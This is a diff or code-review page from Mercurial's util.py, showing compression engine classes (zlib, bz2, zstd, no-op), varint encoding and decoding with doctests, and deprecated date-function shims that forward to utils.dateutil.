3613 return compressed
3618 return compressed
3614 return None
3619 return None
3615
3620
3616 # zlib makes an internal copy of the input buffer, doubling
3621 # zlib makes an internal copy of the input buffer, doubling
3617 # memory usage for large inputs. So do streaming compression
3622 # memory usage for large inputs. So do streaming compression
3618 # on large inputs.
3623 # on large inputs.
3619 else:
3624 else:
3620 z = zlib.compressobj()
3625 z = zlib.compressobj()
3621 parts = []
3626 parts = []
3622 pos = 0
3627 pos = 0
3623 while pos < insize:
3628 while pos < insize:
3624 pos2 = pos + 2**20
3629 pos2 = pos + 2**20
3625 parts.append(z.compress(data[pos:pos2]))
3630 parts.append(z.compress(data[pos:pos2]))
3626 pos = pos2
3631 pos = pos2
3627 parts.append(z.flush())
3632 parts.append(z.flush())
3628
3633
3629 if sum(map(len, parts)) < insize:
3634 if sum(map(len, parts)) < insize:
3630 return ''.join(parts)
3635 return ''.join(parts)
3631 return None
3636 return None
3632
3637
3633 def decompress(self, data):
3638 def decompress(self, data):
3634 try:
3639 try:
3635 return zlib.decompress(data)
3640 return zlib.decompress(data)
3636 except zlib.error as e:
3641 except zlib.error as e:
3637 raise error.RevlogError(_('revlog decompress error: %s') %
3642 raise error.RevlogError(_('revlog decompress error: %s') %
3638 forcebytestr(e))
3643 forcebytestr(e))
3639
3644
3640 def revlogcompressor(self, opts=None):
3645 def revlogcompressor(self, opts=None):
3641 return self.zlibrevlogcompressor()
3646 return self.zlibrevlogcompressor()
3642
3647
3643 compengines.register(_zlibengine())
3648 compengines.register(_zlibengine())
3644
3649
3645 class _bz2engine(compressionengine):
3650 class _bz2engine(compressionengine):
3646 def name(self):
3651 def name(self):
3647 return 'bz2'
3652 return 'bz2'
3648
3653
3649 def bundletype(self):
3654 def bundletype(self):
3650 """An algorithm that produces smaller bundles than ``gzip``.
3655 """An algorithm that produces smaller bundles than ``gzip``.
3651
3656
3652 All Mercurial clients should support this format.
3657 All Mercurial clients should support this format.
3653
3658
3654 This engine will likely produce smaller bundles than ``gzip`` but
3659 This engine will likely produce smaller bundles than ``gzip`` but
3655 will be significantly slower, both during compression and
3660 will be significantly slower, both during compression and
3656 decompression.
3661 decompression.
3657
3662
3658 If available, the ``zstd`` engine can yield similar or better
3663 If available, the ``zstd`` engine can yield similar or better
3659 compression at much higher speeds.
3664 compression at much higher speeds.
3660 """
3665 """
3661 return 'bzip2', 'BZ'
3666 return 'bzip2', 'BZ'
3662
3667
3663 # We declare a protocol name but don't advertise by default because
3668 # We declare a protocol name but don't advertise by default because
3664 # it is slow.
3669 # it is slow.
3665 def wireprotosupport(self):
3670 def wireprotosupport(self):
3666 return compewireprotosupport('bzip2', 0, 0)
3671 return compewireprotosupport('bzip2', 0, 0)
3667
3672
3668 def compressstream(self, it, opts=None):
3673 def compressstream(self, it, opts=None):
3669 opts = opts or {}
3674 opts = opts or {}
3670 z = bz2.BZ2Compressor(opts.get('level', 9))
3675 z = bz2.BZ2Compressor(opts.get('level', 9))
3671 for chunk in it:
3676 for chunk in it:
3672 data = z.compress(chunk)
3677 data = z.compress(chunk)
3673 if data:
3678 if data:
3674 yield data
3679 yield data
3675
3680
3676 yield z.flush()
3681 yield z.flush()
3677
3682
3678 def decompressorreader(self, fh):
3683 def decompressorreader(self, fh):
3679 def gen():
3684 def gen():
3680 d = bz2.BZ2Decompressor()
3685 d = bz2.BZ2Decompressor()
3681 for chunk in filechunkiter(fh):
3686 for chunk in filechunkiter(fh):
3682 yield d.decompress(chunk)
3687 yield d.decompress(chunk)
3683
3688
3684 return chunkbuffer(gen())
3689 return chunkbuffer(gen())
3685
3690
3686 compengines.register(_bz2engine())
3691 compengines.register(_bz2engine())
3687
3692
3688 class _truncatedbz2engine(compressionengine):
3693 class _truncatedbz2engine(compressionengine):
3689 def name(self):
3694 def name(self):
3690 return 'bz2truncated'
3695 return 'bz2truncated'
3691
3696
3692 def bundletype(self):
3697 def bundletype(self):
3693 return None, '_truncatedBZ'
3698 return None, '_truncatedBZ'
3694
3699
3695 # We don't implement compressstream because it is hackily handled elsewhere.
3700 # We don't implement compressstream because it is hackily handled elsewhere.
3696
3701
3697 def decompressorreader(self, fh):
3702 def decompressorreader(self, fh):
3698 def gen():
3703 def gen():
3699 # The input stream doesn't have the 'BZ' header. So add it back.
3704 # The input stream doesn't have the 'BZ' header. So add it back.
3700 d = bz2.BZ2Decompressor()
3705 d = bz2.BZ2Decompressor()
3701 d.decompress('BZ')
3706 d.decompress('BZ')
3702 for chunk in filechunkiter(fh):
3707 for chunk in filechunkiter(fh):
3703 yield d.decompress(chunk)
3708 yield d.decompress(chunk)
3704
3709
3705 return chunkbuffer(gen())
3710 return chunkbuffer(gen())
3706
3711
3707 compengines.register(_truncatedbz2engine())
3712 compengines.register(_truncatedbz2engine())
3708
3713
3709 class _noopengine(compressionengine):
3714 class _noopengine(compressionengine):
3710 def name(self):
3715 def name(self):
3711 return 'none'
3716 return 'none'
3712
3717
3713 def bundletype(self):
3718 def bundletype(self):
3714 """No compression is performed.
3719 """No compression is performed.
3715
3720
3716 Use this compression engine to explicitly disable compression.
3721 Use this compression engine to explicitly disable compression.
3717 """
3722 """
3718 return 'none', 'UN'
3723 return 'none', 'UN'
3719
3724
3720 # Clients always support uncompressed payloads. Servers don't because
3725 # Clients always support uncompressed payloads. Servers don't because
3721 # unless you are on a fast network, uncompressed payloads can easily
3726 # unless you are on a fast network, uncompressed payloads can easily
3722 # saturate your network pipe.
3727 # saturate your network pipe.
3723 def wireprotosupport(self):
3728 def wireprotosupport(self):
3724 return compewireprotosupport('none', 0, 10)
3729 return compewireprotosupport('none', 0, 10)
3725
3730
3726 # We don't implement revlogheader because it is handled specially
3731 # We don't implement revlogheader because it is handled specially
3727 # in the revlog class.
3732 # in the revlog class.
3728
3733
3729 def compressstream(self, it, opts=None):
3734 def compressstream(self, it, opts=None):
3730 return it
3735 return it
3731
3736
3732 def decompressorreader(self, fh):
3737 def decompressorreader(self, fh):
3733 return fh
3738 return fh
3734
3739
3735 class nooprevlogcompressor(object):
3740 class nooprevlogcompressor(object):
3736 def compress(self, data):
3741 def compress(self, data):
3737 return None
3742 return None
3738
3743
3739 def revlogcompressor(self, opts=None):
3744 def revlogcompressor(self, opts=None):
3740 return self.nooprevlogcompressor()
3745 return self.nooprevlogcompressor()
3741
3746
3742 compengines.register(_noopengine())
3747 compengines.register(_noopengine())
3743
3748
3744 class _zstdengine(compressionengine):
3749 class _zstdengine(compressionengine):
3745 def name(self):
3750 def name(self):
3746 return 'zstd'
3751 return 'zstd'
3747
3752
3748 @propertycache
3753 @propertycache
3749 def _module(self):
3754 def _module(self):
3750 # Not all installs have the zstd module available. So defer importing
3755 # Not all installs have the zstd module available. So defer importing
3751 # until first access.
3756 # until first access.
3752 try:
3757 try:
3753 from . import zstd
3758 from . import zstd
3754 # Force delayed import.
3759 # Force delayed import.
3755 zstd.__version__
3760 zstd.__version__
3756 return zstd
3761 return zstd
3757 except ImportError:
3762 except ImportError:
3758 return None
3763 return None
3759
3764
3760 def available(self):
3765 def available(self):
3761 return bool(self._module)
3766 return bool(self._module)
3762
3767
3763 def bundletype(self):
3768 def bundletype(self):
3764 """A modern compression algorithm that is fast and highly flexible.
3769 """A modern compression algorithm that is fast and highly flexible.
3765
3770
3766 Only supported by Mercurial 4.1 and newer clients.
3771 Only supported by Mercurial 4.1 and newer clients.
3767
3772
3768 With the default settings, zstd compression is both faster and yields
3773 With the default settings, zstd compression is both faster and yields
3769 better compression than ``gzip``. It also frequently yields better
3774 better compression than ``gzip``. It also frequently yields better
3770 compression than ``bzip2`` while operating at much higher speeds.
3775 compression than ``bzip2`` while operating at much higher speeds.
3771
3776
3772 If this engine is available and backwards compatibility is not a
3777 If this engine is available and backwards compatibility is not a
3773 concern, it is likely the best available engine.
3778 concern, it is likely the best available engine.
3774 """
3779 """
3775 return 'zstd', 'ZS'
3780 return 'zstd', 'ZS'
3776
3781
3777 def wireprotosupport(self):
3782 def wireprotosupport(self):
3778 return compewireprotosupport('zstd', 50, 50)
3783 return compewireprotosupport('zstd', 50, 50)
3779
3784
3780 def revlogheader(self):
3785 def revlogheader(self):
3781 return '\x28'
3786 return '\x28'
3782
3787
3783 def compressstream(self, it, opts=None):
3788 def compressstream(self, it, opts=None):
3784 opts = opts or {}
3789 opts = opts or {}
3785 # zstd level 3 is almost always significantly faster than zlib
3790 # zstd level 3 is almost always significantly faster than zlib
3786 # while providing no worse compression. It strikes a good balance
3791 # while providing no worse compression. It strikes a good balance
3787 # between speed and compression.
3792 # between speed and compression.
3788 level = opts.get('level', 3)
3793 level = opts.get('level', 3)
3789
3794
3790 zstd = self._module
3795 zstd = self._module
3791 z = zstd.ZstdCompressor(level=level).compressobj()
3796 z = zstd.ZstdCompressor(level=level).compressobj()
3792 for chunk in it:
3797 for chunk in it:
3793 data = z.compress(chunk)
3798 data = z.compress(chunk)
3794 if data:
3799 if data:
3795 yield data
3800 yield data
3796
3801
3797 yield z.flush()
3802 yield z.flush()
3798
3803
3799 def decompressorreader(self, fh):
3804 def decompressorreader(self, fh):
3800 zstd = self._module
3805 zstd = self._module
3801 dctx = zstd.ZstdDecompressor()
3806 dctx = zstd.ZstdDecompressor()
3802 return chunkbuffer(dctx.read_from(fh))
3807 return chunkbuffer(dctx.read_from(fh))
3803
3808
3804 class zstdrevlogcompressor(object):
3809 class zstdrevlogcompressor(object):
3805 def __init__(self, zstd, level=3):
3810 def __init__(self, zstd, level=3):
3806 # Writing the content size adds a few bytes to the output. However,
3811 # Writing the content size adds a few bytes to the output. However,
3807 # it allows decompression to be more optimal since we can
3812 # it allows decompression to be more optimal since we can
3808 # pre-allocate a buffer to hold the result.
3813 # pre-allocate a buffer to hold the result.
3809 self._cctx = zstd.ZstdCompressor(level=level,
3814 self._cctx = zstd.ZstdCompressor(level=level,
3810 write_content_size=True)
3815 write_content_size=True)
3811 self._dctx = zstd.ZstdDecompressor()
3816 self._dctx = zstd.ZstdDecompressor()
3812 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3817 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3813 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3818 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3814
3819
3815 def compress(self, data):
3820 def compress(self, data):
3816 insize = len(data)
3821 insize = len(data)
3817 # Caller handles empty input case.
3822 # Caller handles empty input case.
3818 assert insize > 0
3823 assert insize > 0
3819
3824
3820 if insize < 50:
3825 if insize < 50:
3821 return None
3826 return None
3822
3827
3823 elif insize <= 1000000:
3828 elif insize <= 1000000:
3824 compressed = self._cctx.compress(data)
3829 compressed = self._cctx.compress(data)
3825 if len(compressed) < insize:
3830 if len(compressed) < insize:
3826 return compressed
3831 return compressed
3827 return None
3832 return None
3828 else:
3833 else:
3829 z = self._cctx.compressobj()
3834 z = self._cctx.compressobj()
3830 chunks = []
3835 chunks = []
3831 pos = 0
3836 pos = 0
3832 while pos < insize:
3837 while pos < insize:
3833 pos2 = pos + self._compinsize
3838 pos2 = pos + self._compinsize
3834 chunk = z.compress(data[pos:pos2])
3839 chunk = z.compress(data[pos:pos2])
3835 if chunk:
3840 if chunk:
3836 chunks.append(chunk)
3841 chunks.append(chunk)
3837 pos = pos2
3842 pos = pos2
3838 chunks.append(z.flush())
3843 chunks.append(z.flush())
3839
3844
3840 if sum(map(len, chunks)) < insize:
3845 if sum(map(len, chunks)) < insize:
3841 return ''.join(chunks)
3846 return ''.join(chunks)
3842 return None
3847 return None
3843
3848
3844 def decompress(self, data):
3849 def decompress(self, data):
3845 insize = len(data)
3850 insize = len(data)
3846
3851
3847 try:
3852 try:
3848 # This was measured to be faster than other streaming
3853 # This was measured to be faster than other streaming
3849 # decompressors.
3854 # decompressors.
3850 dobj = self._dctx.decompressobj()
3855 dobj = self._dctx.decompressobj()
3851 chunks = []
3856 chunks = []
3852 pos = 0
3857 pos = 0
3853 while pos < insize:
3858 while pos < insize:
3854 pos2 = pos + self._decompinsize
3859 pos2 = pos + self._decompinsize
3855 chunk = dobj.decompress(data[pos:pos2])
3860 chunk = dobj.decompress(data[pos:pos2])
3856 if chunk:
3861 if chunk:
3857 chunks.append(chunk)
3862 chunks.append(chunk)
3858 pos = pos2
3863 pos = pos2
3859 # Frame should be exhausted, so no finish() API.
3864 # Frame should be exhausted, so no finish() API.
3860
3865
3861 return ''.join(chunks)
3866 return ''.join(chunks)
3862 except Exception as e:
3867 except Exception as e:
3863 raise error.RevlogError(_('revlog decompress error: %s') %
3868 raise error.RevlogError(_('revlog decompress error: %s') %
3864 forcebytestr(e))
3869 forcebytestr(e))
3865
3870
3866 def revlogcompressor(self, opts=None):
3871 def revlogcompressor(self, opts=None):
3867 opts = opts or {}
3872 opts = opts or {}
3868 return self.zstdrevlogcompressor(self._module,
3873 return self.zstdrevlogcompressor(self._module,
3869 level=opts.get('level', 3))
3874 level=opts.get('level', 3))
3870
3875
3871 compengines.register(_zstdengine())
3876 compengines.register(_zstdengine())
3872
3877
def bundlecompressiontopics():
    """Obtain a dict of available bundle compressions for use in help.

    help.makeitemsdocs() expects a mapping of names to items exposing a
    ``__doc__`` attribute, so each entry is a small dummy object carrying a
    formatted copy of the engine's bundletype docstring.
    """
    # Dummy type so the formatted docstring can be attached without
    # mutating the engine's original function.
    class docobject(object):
        pass

    topics = {}
    for name in compengines:
        engine = compengines[name]
        if not engine.available():
            continue

        bt = engine.bundletype()
        # Engines without a user-facing bundle type name are skipped.
        if not bt or not bt[0]:
            continue

        entry = docobject()
        entry.__doc__ = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)
        entry._origdoc = engine.bundletype.__doc__
        entry._origfunc = engine.bundletype
        topics[bt[0]] = entry

    return topics
3904
3909
# Expose the doc-carrying objects built above; presumably the i18n tooling
# scans this name to pick up their docstrings for translation — verify
# against the i18n extraction scripts.
i18nfunctions = bundlecompressiontopics().values()
3906
3911
# Convenient debugging shortcut: ``dst(...)`` is a short alias for
# debugstacktrace(...).
dst = debugstacktrace
3909
3914
def safename(f, tag, ctx, others=None):
    """Generate a name it is safe to rename ``f`` to in context ``ctx``.

    f: filename to rename
    tag: a string tag that will be embedded in the generated name
    ctx: a context in which the generated name must not already exist
    others: optional set of additional filenames the result must avoid

    Returns a file name of the form ``oldname~tag[~number]`` which is
    neither in the provided context nor in the set of other names.
    """
    taken = others if others is not None else set()

    candidate = '%s~%s' % (f, tag)
    suffix = 0
    # Keep appending an increasing numeric suffix until the candidate is
    # free in both the context and the extra name set.
    while candidate in ctx or candidate in taken:
        suffix += 1
        candidate = '%s~%s~%s' % (f, tag, suffix)
    return candidate
3932
3937
def readexactly(stream, n):
    '''Read exactly n bytes from stream.read; abort if fewer were available.'''
    data = stream.read(n)
    got = len(data)
    if got >= n:
        return data
    # A short read means the stream ended mid-record; that is fatal.
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (got, n))
3941
3946
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    # Split the value into 7-bit groups, least significant first.
    groups = []
    while True:
        groups.append(value & 0x7f)
        value >>= 7
        if not value:
            break
    # Every group except the last carries a continuation bit.
    encoded = [pycompat.bytechr(0x80 | g) for g in groups[:-1]]
    encoded.append(pycompat.bytechr(groups[-1]))
    return ''.join(encoded)
3978
3983
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    # Each byte contributes 7 payload bits; the shift grows by 7 per byte.
    for shift in itertools.count(0, 7):
        byte = ord(readexactly(fh, 1))
        value |= (byte & 0x7f) << shift
        # A clear continuation bit marks the final byte.
        if not (byte & 0x80):
            return value
4011
4016
###
# Deprecation warnings for util.py splitting
###

# Re-export the date format tables from their new home in utils.dateutil so
# existing callers of util.defaultdateformats keep working.
defaultdateformats = dateutil.defaultdateformats

extendeddateformats = dateutil.extendeddateformats
4019
4024
def makedate(*args, **kwargs):
    """Deprecated shim; forwards to utils.dateutil.makedate."""
    nouideprecwarn("'util.makedate' is deprecated, "
                   "use 'utils.dateutil.makedate'", "4.6")
    return dateutil.makedate(*args, **kwargs)
4025
4030
def datestr(*args, **kwargs):
    """Deprecated shim; forwards to utils.dateutil.datestr.

    Emits a deprecation warning, like the other util.py date shims.
    """
    msg = ("'util.datestr' is deprecated, "
           "use 'utils.dateutil.datestr'")
    nouideprecwarn(msg, "4.6")
    # Dropped the unconditional debugstacktrace() call that was here: none
    # of the sibling deprecation shims have one, and it printed a stack
    # trace on every call — it looked like a debugging leftover.
    return dateutil.datestr(*args, **kwargs)
4032
4037
def shortdate(*args, **kwargs):
    """Deprecated shim; forwards to utils.dateutil.shortdate."""
    warningmsg = ("'util.shortdate' is deprecated, "
                  "use 'utils.dateutil.shortdate'")
    nouideprecwarn(warningmsg, "4.6")
    return dateutil.shortdate(*args, **kwargs)
4038
4043
def parsetimezone(*args, **kwargs):
    """Deprecated shim; forwards to utils.dateutil.parsetimezone."""
    nouideprecwarn("'util.parsetimezone' is deprecated, "
                   "use 'utils.dateutil.parsetimezone'", "4.6")
    return dateutil.parsetimezone(*args, **kwargs)
4044
4049
def strdate(*args, **kwargs):
    """Deprecated shim; forwards to utils.dateutil.strdate."""
    deprecated = ("'util.strdate' is deprecated, "
                  "use 'utils.dateutil.strdate'")
    nouideprecwarn(deprecated, "4.6")
    return dateutil.strdate(*args, **kwargs)
4050
4055
def parsedate(*args, **kwargs):
    """Deprecated shim; forwards to utils.dateutil.parsedate."""
    nouideprecwarn("'util.parsedate' is deprecated, "
                   "use 'utils.dateutil.parsedate'", "4.6")
    return dateutil.parsedate(*args, **kwargs)
4056
4061
def matchdate(*args, **kwargs):
    """Deprecated shim; forwards to utils.dateutil.matchdate."""
    warningmsg = ("'util.matchdate' is deprecated, "
                  "use 'utils.dateutil.matchdate'")
    nouideprecwarn(warningmsg, "4.6")
    return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now